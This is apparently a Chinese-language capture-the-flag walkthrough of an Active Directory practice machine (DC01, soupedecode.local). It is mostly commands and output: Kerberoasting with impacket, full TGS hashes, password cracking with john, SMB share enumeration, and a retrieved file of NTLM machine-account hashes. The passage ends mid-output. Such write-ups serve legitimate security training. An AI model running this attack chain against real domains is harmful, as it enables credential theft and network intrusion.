7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# sudo apt-get install ntpdate -y
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo ntpdate soupedecode.local
2024-08-11 01:22:30.090816 (-0400) +47467.381814 +/- 0.000614 soupedecode.local 192.168.10.102 s1 no-leap
CLOCK: time stepped by 47467.381814
┌──(kali💀kali)-[~/temp/DC01]
└─$ date
Sun Aug 11 01:22:33 AM EDT 2024
┌──(kali💀kali)-[~/temp/DC01]
└─$ nmap -sCV -p 88 -Pn $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 12:11 EDT
Nmap scan report for soupedecode.local (192.168.10.102)
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:22:56Z)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.36 seconds
使用rdate进行同步:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# sudo apt-get install rdate -y
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo rdate -n 192.168.10.102
Sun Aug 11 01:28:12 EDT 2024
┌──(kali💀kali)-[~/temp/DC01]
└─$ nmap -sCV -p 88 -Pn $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 12:17 EDT
Nmap scan report for soupedecode.local (192.168.10.102)
Host is up (0.0082s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:28:24Z)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.29 seconds
发现还是不对,重启靶机!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali💀kali)-[~/temp/DC01]
└─$ nmap -sCV -p 88 -Pn $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 12:18 EDT
Nmap scan report for soupedecode.local (192.168.10.102)
Host is up (0.0023s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:09:22Z)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.29 seconds
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo rdate -n 192.168.10.102
Sun Aug 11 01:09:33 EDT 2024
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo ntpdate soupedecode.local
2024-08-11 01:09:44.141908 (-0400) +46218.812949 +/- 0.000751 soupedecode.local 192.168.10.102 s1 no-leap
CLOCK: time stepped by 46218.812949
看来实际上是没有差别的,就先这样试试?还是不行:
1
2
3
4
5
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo python3 GetUserSPNs.py -dc-ip $IP SOUPEDECODE.LOCAL/ybob317:ybob317 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c
找一下使用方法,看看是不是操作哪里不对:https://notes.benheater.com/books/active-directory/page/getuserspnspy
1
2
3
4
5
┌──(kali💀kali)-[~/temp/DC01]
└─$ impacket-GetUserSPNs -dc-ip $IP 'soupedecode.local/ybob317:ybob317'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c
奇奇怪怪,没有脑袋,重新载入靶机和攻击机,再试一次,不行睡觉。。。。。这部分先跳了,感觉是哪里配置有问题。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient //$IP/Users -U ybob317
Password for [WORKGROUP\ybob317]:
session setup failed: NT_STATUS_PASSWORD_EXPIRED
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient -L $IP
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.10.106 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient //$IP/backup -U file_svc
Password for [WORKGROUP\file_svc]:
session setup failed: NT_STATUS_PASSWORD_EXPIRED
都过期了,毁灭吧!!!!!后面听群主提了一嘴,需要手动进行更新一下:
ctrl+alt+del(virtualbox 里面是右键ctrl+del)解锁,然后按esc返回上一级:
更换我们得到的用户进行登录更新!
然后更换新密码进行登录:
1
2
ybob317317317
Ybob317317317
接着做即可:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo arp-scan -l -I eth1 | grep PCS
[sudo] password for kali:
192.168.10.106 08:00:27:80:24:7d PCS Systemtechnik GmbH
┌──(kali💀kali)-[~/temp/DC01]
└─$ IP=192.168.10.106
┌──(kali💀kali)-[~/temp/DC01]
└─$ nmap -sCV -p 88 -Pn $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-16 00:05 EDT
Nmap scan report for 192.168.10.106
Host is up (0.0015s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-16 19:06:00Z)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.26 seconds
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo ntpdate soupedecode.local
ntpdig: no eligible servers
┌──(kali💀kali)-[~/temp/DC01]
└─$ tail -n 1 /etc/hosts
192.168.10.102 soupedecode.local
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo vim /etc/hosts
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo ntpdate soupedecode.local
2024-08-16 15:06:58.202273 (-0400) +53999.016483 +/- 0.000783 soupedecode.local 192.168.10.106 s1 no-leap
CLOCK: time stepped by 53999.016483
┌──(kali💀kali)-[~/temp/DC01]
└─$ impacket-GetUserSPNs -dc-ip $IP 'soupedecode.local/ybob317:Ybob317317317'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
┌──(kali💀kali)-[~/temp/DC01]
└─$ impacket-GetUserSPNs -dc-ip $IP 'soupedecode.local/ybob317:Ybob317317317' -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo rdate -n $IP
Fri Aug 16 15:09:04 EDT 2024
┌──(kali💀kali)-[~/temp/DC01]
└─$ impacket-GetUserSPNs -dc-ip $IP 'soupedecode.local/ybob317:Ybob317317317' -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local/file_svc*$c81ce3adafb236751d99d0f2de069816$f7d83c90969061e4e24e78f232dcdc9c76d752eff19241bb7e1b47781ce21f1d615fa24df8a20200d99fc094995b09becc90bd76a026c3fb043c8d86057ccc695f889c813abd7df854f9d252fdaf4e50754792de3269128bd7621cefe89200e78b2139669d5908ee896a90c425168251ea5eb9785e4096c2bb67897312c34476de2208da3659424a30b38b2c220c49f356eff0cdfb2ce4f79749f54f8d64758b4cbd5bba5830f4afb1830bf40d1d3d9445261780d107d1a378b27990a0dbf3892837737e10071598e6464b4fdc820f6f0dbbc8ee3d6b8cc8eb2a5717e19e3147ee0166a0f9e9a1d9d091cd926f3a9676f203a8bdae3cfd97b6be015931dd9a8d14d4c0b8139e408a5c98c7cf6d60c1d71575983e41b34cdc537c92e3b9551438b5b2e7463dd739435852228d8ae9a89af5bf8b0e296a9ae5af27338c9b7a4295440bb63514595b79539dd858f19fd232310f78957251ffd4f3c858b6ac53a58c1df0cb110674477f82b659c9f220b1b0fa2e8b01c56b2dcba5cd1ba61dfe218b789132bdc1fc0f1d1c466c7dd37789df7ca751f416bfafdce2678742a2f618a7bdf99755674f805c40bb753601709def6732a25936531e79bff9ced7240219cf53a3962e0d1f859a488836a7991f86263a414e593db1172e540e74c279d3d5aa4177fa5d15adab81af6c290d359ecd1afca4c6ebece0dbf000ab034ef522d9ee201de001181b9b4bb3d3696c81967a9cb4456b49d24772c3ba6b32bc19f7d3862fbc4b67d8755a8b6329b5a941694eb82331d68d19e4361958fab6f44208dd51c711c0191bfb00741b1f765952694b59b9b137638b59c2b065c89c350b1d3b65c91422fcb4b8d4c030f75a1465f78337a872d758268c5a386b6b76c206e11370fed14658fc624eccdccd56f6e28ce639152e275a3d0031dbb938e2e7f60959e87453eb64722db4e284ed3e6925810811391e41b6c7ee5b1ad0260b3627d01880a63737a923f221208e1f143f6d0a767a1fb461fca5b2467bca9a5909774b0759c67e44e04eddfde6b2471e1da2d0d4f16d945456ed5e171c206ade3f77efb6d5818fcf0ed09d5957588f4b94243d8445d6308c4b41d607890a578d2d612758d298a915e31cea18e987b9c4e939331b54e6cc1305ea3f3313b132da0d73dd3456e293c961763307ff6269737c988ff5df35bc5dbeabd97ab7eada45fdf257229b00419851874c599949662d8dd97c23f7766c5dabe168036b181a88b2f933939e1ed7577a311683e0cca69003e0cd4c3c7e332119ffd0b0075f6ebc65ebda10f669f8ab810e3aebc15e37a78eeaab4d77a9e4d85e855ca9c8beb4d0a65ce7b748c93a97a388a85edddcc601c736187e05cb130ddef3ffa7ec27f7b1cb82b882bdf2d2baa2c8fdbb869c9d9d687ab5746181a85c0694283b902635cffaa3c573718ef1340777fb46446df09ce649397b14e9544e7aba29e5923afa95040269268631
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$soupedecode.local/firewall_svc*$f4c7c2ec54d1f194563376179174baaa$a78a95b5641c8730142c652df295bdd3b4a3ad20b9adf589a64ce85fd13b85f516a2bdc7e0769609af5af472e2675d2d01be5fd6a4308ac0fa13edd54502b1d7cf0499fb00ad6ff8ce425f0fc524d6287bb34f5ce8f8e03bfa9bd767e5aca8bee065d613ca1bef9b48c52fda28f029d08371f3f706553a09f47282c0128fe5c8ac1ea6f1b4fc02d51c760633a89f58f1f075a8aa8cefa1f3b7ff38bec511cf114763d0bc6bfebbbd58c299400b5f506f5c05318573a52e1eb20d306f530675b958be5c9105060d6907adec6254dee5c227524d1a5ea62db4afd73d6a4f9c33b03cf3f2e8c177bcc938a3dd887efb00d4bd5f91fcfe27ab1264af5e484d4a51ebf9a3e4322ebd2c242c8d57b9c51094fa2bf90f26bb82a5eb2881944105735145129d0f1838a9da2c055fe0cb0d9b41abd78856521970ec5d831a1f02274b08609e232c4cd372dd7f6cf708b98d450458b1473a21776fec8f370b061a0d303887c5d4fad04353bfa5ecafdf91e73269acf5d36fdaf5034a9fd9d7291ecdc5b34112df2c9c8519a3628bc6f6abe1f52bbd09bfd450eb69089699742fb1473fa56eb36a9d305faac7b1da3eeeea7ad06829526535b82eda2c4ca94bdcd99887e51af24d53c101f3a41052ee6894e349f321b8b007e94f08cc37cf4a1f39ca27ff7cf143a93bcc7d8eb919e952b16d41bcd1df9709eab4414c02eb9d0cabdac501697c2130e53b1054b9ce7164d8cf76dae4910c82caece522a36ee68c70f883b65c1121e6cc8c9a33482555ebc6027f1450d0b115b5335cb9e73f9ecc1aab2b9661540ab566fc5bcd22d527ea068ec67566cc5f614ef7298753312724c5bbc80803b3fdc1afb1d9fedbd4900f75e7c997b53c401e4943aec392796da653fedf1b5bb4fd84529f13586b169966979048a9e61e5894a20e6840f28250de44556b22098409cb4acc2955a49a5540c2032cf9ff037da380607525daebcf28a03694aa98a37f1161d0024265b4bb0b09e29cab1b7cbc22064c9628150adb69ee74c99ec776aa7ef31809f56519abc1ae995d11b5cf3ce68b035f30d88e30609e0b4b17eaa337ecc5cc2266c06dd3e9b74b87df9f5e309280eabd4b116b43a0f6c38ca15a1f5890c5f764da705452d368a916b86c6bfd18a187c449d84d67ef49a6184ea85fc6c9a43a6f2556b3ddbec110ae925f11f3cae8433e657661d42414dbafad9afa002c26c45044351e6fa67807bf9df10d544d6dc66b7d9a0a6e74cdbc930f24ede3da81cfd89c84ace95ad350ddd08c18f29d30e32c922ec954e44a0756ee4bd0066ce188d7e4f9a87d9635902ec222a8954911d84865daa19f370f22afff2ab0f119057a0d48cce85e0e4d1a884fb698490d59acdf009644173577f87fc916c4ba88e9996b19f9131d767f839d3bd6405a15e1562a7b1d941137141de2058b6bb48a8d3d9ac01ae784fbbd595633f794a9c9844202704761b082211af6e12403
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$soupedecode.local/backup_svc*$496e923b5e34674592aaada0fb125ec7$714610d11f57946fe1a1cc2ce948c2cd1db585b8b22a6012ffe5cb8877fae5f9921e24d35b1f1b8098d36711a59433b531794cc6e75420899b9e4e17b22d6610c60e5f496ad9dece08c6d54f12d91cf5e07af4eaf64665ec1405ce97540e9fc66befe6060b6d6c446db6d6a85bc45dec03770e246be346823ee48163e96a40d119c200b4ff479f337736e286e322d62d5688d259cae2342ecc63a17241ccaea0746e28e31e790aeb540842c4a66ca53fdeeeda166ddbc8328f62278105fc86c1014e09d3be70888628040b073164829ee509d84e1ea1a1d8041b9d2b151c47d09975ab9a1aed87d5a2e0293fa12181f9d302c5dcebc0ffd348d3b5cfd66188f5a49d91fff40d1b2a5fcf24cd6ec8d60b63f1cff753de564fb326d001677da96b24a79f6e0fe63d6ada6de7ff75ba55f2c7e04949d8c9761234739f71b9c11cffb5348c6771bc1ea6877cedcfccb629b4290b574c9cf885da31f60921523e1661381add1b5415953803a07c274e2f6218458190d82240c07a38024329133a62f8083c2f64fa01346e2f4bf8bafe36e1c10efb68d3af91a0d33b34170ce8fcdea774cb9f7f4d5e963edaba36c0acccf5970542d0ed4c6260c4ca456dc3440fb562961601591f70d0dcf7a28979d115db95a43d5c3d5768eac32432a4f3ab9446c967c654fd4b4c992dc2b5d87e2ba5d0230b70f761b76e96247a942de7fa58ee5467a1d705bec220c468b7c6795904713bcfb53964d133cbc91e2f3e1aba0661c5046f398f6dafd5996bb2e03db09e1760f13eccf2b386fc0828042198edc5534ee387b872e325ace12dc167bdd19db68de632bc7e7992f9601d0a0d445185ba859840e52e2bd84811df42a9e83bf1bb8b214a08d48b2a0670f95b8cb1ca3358269b8d7b4c49bcbf3645a7d702f877717f86f6ffa03d1d0bd77c1bd8a66a246ef2b498e447b9cfb7685d24ea968f773d5fd0954a40ce9879d7b75f42fcd1dc374c2775d3f24c72225804089c0c443859d23db4cfbdabb6fd6b733477ec0e366b325e9947e8a890b13bae55cddfc058642879a9e5789121081db31fe5b2ba08b7db9b6b0ae9139fd90a32fd137ac631ff708217c3c8f7932a1c66306a844162212c7728323d408f918a5b78852b7603d93d7ef4c4c14e115b170e20b1f00f79591bd3d8f5f322daa47f293853af1460ff5c29a75db035b521c135021ba79c438eb33abeda9b904c230b16996968972832eca73117397ec0ad96631a6da6f29c485f9fe33bb394137787ec265646ae5d723ab9e863986dd43599e74a5b847a76759b34d09bdfcc9b123faa75033ae7b45dbd2af32fb3cf628d31fca2f4d335080ddbfa2649c480f8f50da8f6cb9f23224772b1817eda93516d20e9a566359e68ce25af89c01dd211b4e71552a2586c693b92fbb7ca905392dc43bae82a1e5ac1b0d767efeb1d786cc870e25188dd586af7126f65ebe5c95474ab1c4979285153dfb020
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$soupedecode.local/web_svc*$969bf48d7346bb1eb51825341ca43ad2$58e9bec68260a352da6bbb6b48af5d0e0df0e6133fa2cf44844fb0d7668000d3fe9b0e40bef6ddb9f13acb14b5907932c892a9634ce92abca074dd8afa408b6dc9c9a44d18ecd54a5dc9a69da41d3d490b51bd6ab54a910e71744bb2d09228640b2a11007e872658fb418f76e88db70eb8778cb09dda6a53783b0d1345b98ade162c0c5106bf957d004aed4482926aa2b4ca2fa036f1e1cbafa23b0508d3a5bcce87fca36d3dc39e00c480dff20b61d768a89f83d2a6c1b036b9780327255907ea050506057b3b972a3072a66553fd15c54a760f095a7b2e18442d9f11f29fad6e174d10535df8107f2c82179f04bd9151b9f02747757bccedd69485c4da6b9bc981addf2287b7b91cb469e4314ada6466ceb035c23c87d77197f66c7a7d7fa11dc1edaadca2c1a58550d2ef4f4361c1b8d7372303bdab9d7d80cf6688b7f90d3c94f874fb095c1c93f9912329cbefebcc782f6564b7ffd6ce702acdf4051a83025ea2b8469188b28c5863299568c3942f4f81ff0ebac7e3c26f159f2b798f4eead3cdf7f47bb012002164b788565fdcfa7d675b88fd0b13cfbaa2f9edd105c9693f2345eec4cf7a1075a465ae12dbfad9d727eec81e8c390decaf18f9e648bc44bcc8763c8fc09dfa31bca7899202d71d445480ba04d0a2e6f11404a75a5e1d8003616efda965cbbbb7f53ef4003accfe0f74ac974ee41673db6961dd3510dfb77ef2e1682af106df318a1e14ee0575278e0dd55fa04a0442840e9a179d64b9e6e5002696a370f2c17bd28512fe15bc0d52bf8e449ecc3145ed1c36d9efee66dee9f2f0b50bb78110fa96599d70105165cd1d4678b5349028941c137cd4100ddf5b6a59434aa16cbe5ef2703100b348b73b8a8a5db2338f5ea75eba1d226a729af3e4705d8fc5bda6278699e0f6f7f853aabf47ad6cc63019375de2d2a21d5e0560b2aebd43270b624c8f87a4c0e58b303f53a3427690cc4e780dc1beaaa1ccc2ecfa523ce8e40cce117fbd9c7aa764554c3a7b030f820ab803aae30722b244109a6607a187a0683e8da9b6c6377312cb6ef720f64aceccda16d9365192883b90de86235dfbb176d17358b3bb359efa4538578f6531dcf08f26dec7977a419278a97bef6b0c9f3f383bfce1876739e414b16a4a688e86d459976747f519fb06cf9230ceafb34351ebe3f996b2ff77f3c0d34aba8bfa8f26ac65e514c87dc280c63c2232ab3ee099314444ab1852a60e4a1749756ef13203ed8437b69a28fe58e9eb98f8343450fb273a27a5c150091eb96f56eea7658b069e0ced9db3e0f3df37431878e7c6a3daa787f4b0c70d4ddeea7098581225f291cb7f470e198d2cafed22d3d62ba3487a526b9118946e6c3d4881ecac17e7f45620cb64a40fb3508c43c6eba0912a7973d2072057b02e0d573525bc3a1f7254404f2740286009b529e020f3358db55c8e1c24b2c50dd67b3ad3fb435b9896d4af1a95c99ee2f5900853
$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$soupedecode.local/monitoring_svc*$a21eca5ab03c1524e2eb41b46b1be2af$bc91db3e8b643f665ee187b0374dff228f33012092b69e59c3c82c891e28f798673f44369da3627f8324f6ec20c822f780443f23cd181eb7f631aa15f246728315ce97546546fbc75f3a3141ac91c8c97b18f2b821862add0963ad83bd275ebe5a67349342a1724932dd17abd28d527c9b284b8ac44b790e293bcacbb98efe41ac01b2add10c6e92845cd6605c7632af83bfade8c6b55bd5b903262704d0d45995f1c5dd32b8507acbec93d135642a22701c9b9c50ef2f82acea5e610c324f321d4c8d698e6b0ae01cd3df60211f7a5ecc9a09c428ca499cb829defd90ef89fe392256dbad9aa28a49eaf1eec3cb84fa3576591ccde4ccbc3b2cc37bfcfebe7929fa641eaf0dddfdf7d3cb7f5de7ebab2b6d3a0aa407ffbeadf25bcab91ed5c11304e5445a63ec8096a7a1af7299b3565dcb72fc06d083d86b525098591f2d9f9cea80bcde51a6de0076d81fbe493e8b301d60ff8ad51a96f2e378efdbdd0ed077a9d7b8d5ac88614e0ced136c0828e81cc07cbab3193b66f00d7bc98bf29821fd57d8b73b4f72ad95dc854baed77a712fd07d0f32ee06aa2a6cdd8f6c97a6bc975ed744c48bdb636581a3b2b5a7ea180007acbae098c6e483a90f98c54e03c7581027bbb27aceb99e7d0668137bb1367554b58e35c109ce3d6049974e9f48f4650fedb74bfdda3199c59b73f8e9d47a88d656312a9437bfaf74d4057418d7d12d37253aa71cb4d1f81182fe9ed1e35015d39fb338c1e5d01ba9f035f302ec6653f8f935a16b80cdc168272c19329e69f0ff91525ac78c75b4e942f678e821dfd55980c74d9ba7b9d89b834878bf3ae16b8884cf087ddd15b4ab98a2a5a5bd782800b2b3cc5ee1c001b1d1df9b6333c4c81815853766b995c87ca6fcce2907d532ea9828a00b59d16de632166ed7ddd13bbcd5ed271524d4f4580fce00c42a6771cdcbed9773ae0e51111dcaee2e08a519c967647d8a987eda97f70b03b972eec5e7ae7c5e031ee71a0026fe3fb298eb646a75aeb7ebde95352c66a7119417918ce8f924cfc23ea205e7274acd7bee1162b99e4a2ca02655dfe010596b6823dfb6e5de26d12921b79f02eb5d67c21424028d833a3cc3c4ba57204ce9258c8dcb040d18972d7271ddf79310e9699d27c93e4db90b33eff4645bde67fc8d915bd8174a1897ec243c0e966effcb0d82931bbfeabfb3fc158490b3f82ff9f7051c5718c0bd998e19be067ec3bee73968a89e0844b6d34becda72085f0234f04a42ad79a93224db654dcf28c4163230602ff7aafd88e136ebbdde42f9feca06319d5cb2a68e4cc670d1e79714fe7a8023fad11cbc2464581092f905c52c6502b70b432123d94c6ecceb10dcf40f3781ba7e72687ff7cba5de46e50c47e7d119a18417206545af0f6f06a1d62b85d9b78614c9f53b919d638939c2da36c0cded9226cb703555aa9ea0f6b06f71e031459cbfd31e875cb24ca790a2dfc9395d5b04bdb30f
hash碰撞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali💀kali)-[~/temp/DC01]
└─$ sudo rdate -n $IP
Fri Aug 16 15:12:03 EDT 2024
┌──(kali💀kali)-[~/temp/DC01]
└─$ impacket-GetUserSPNs -dc-ip $IP 'soupedecode.local/ybob317:Ybob317317317' -request > hash
┌──(kali💀kali)-[~/temp/DC01]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!! (?)
1g 0:00:00:38 DONE (2024-08-16 00:13) 0.02597g/s 372565p/s 1769Kc/s 1769KC/s 0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
smb搜集信息
不知道用户名是哪个,挨个试一下,发现都不行,看了wp:
1
2
3
4
┌──(kali💀kali)-[~/temp/DC01]
└─$ nxc smb $IP -u file_svc -p 'Password123!!'
SMB 192.168.10.106 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\file_svc:Password123!! STATUS_PASSWORD_EXPIRED
靶机又不听话了。。。。。修改密码。。。。
1
Password123!!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(kali💀kali)-[~/temp/DC01]
└─$ nxc smb $IP -u file_svc -p 'Password123!!!'
SMB 192.168.10.106 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.10.106 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!!
┌──(kali💀kali)-[~/temp/DC01]
└─$ nxc smb $IP -u file_svc -p 'Password123!!!' --shares
SMB 192.168.10.106 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.10.106 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!!
SMB 192.168.10.106 445 DC01 [*] Enumerated shares
SMB 192.168.10.106 445 DC01 Share Permissions Remark
SMB 192.168.10.106 445 DC01 ----- ----------- ------
SMB 192.168.10.106 445 DC01 ADMIN$ Remote Admin
SMB 192.168.10.106 445 DC01 backup READ
SMB 192.168.10.106 445 DC01 C$ Default share
SMB 192.168.10.106 445 DC01 IPC$ READ Remote IPC
SMB 192.168.10.106 445 DC01 NETLOGON READ Logon server share
SMB 192.168.10.106 445 DC01 SYSVOL READ Logon server share
SMB 192.168.10.106 445 DC01 Users
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient //$IP/backup -U file_svc
Password for [WORKGROUP\file_svc]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 17 13:41:17 2024
.. DR 0 Mon Jun 17 13:44:56 2024
backup_extract.txt A 892 Mon Jun 17 04:41:05 2024
12942591 blocks of size 4096. 10810869 blocks available
smb: \> get backup_extract.txt
getting file \backup_extract.txt of size 892 as backup_extract.txt (14.8 KiloBytes/sec) (average 14.8 KiloBytes/sec)
smb: \> exit
┌──(kali💀kali)-[~/temp/DC01]
└─$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
然后尝试进行破解:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(kali💀kali)-[~/temp/DC01]
└─$ awk -F '[:]' '{print $1}' backup_extract.txt
WebServer$
DatabaseServer$
CitrixServer$
FileServer$
MailServer$
BackupServer$
ApplicationServer$
PrintServer$
ProxyServer$
MonitoringServer$
┌──(kali💀kali)-[~/temp/DC01]
└─$ awk -F '[:]' '{print $4}' backup_extract.txt
c47b45f5d4df5a494bd19f13e14f7902
406b424c7b483a42458bf6f545c936f7
48fc7eca9af236d7849273990f6c5117
e41da7e79a4c76dbd9cf79d1cb325559
46a4655f18def136b3bfab7b0b4e70e3
46a4655f18def136b3bfab7b0b4e70e3
8cd90ac6cba6dde9d8038b068c17e9f5
b8a38c432ac59ed00b2a373f4f050d28
4e3f0bb3e5b6e3e662611b1a87988881
48fc7eca9af236d7849273990f6c5117
┌──(kali💀kali)-[~/temp/DC01]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
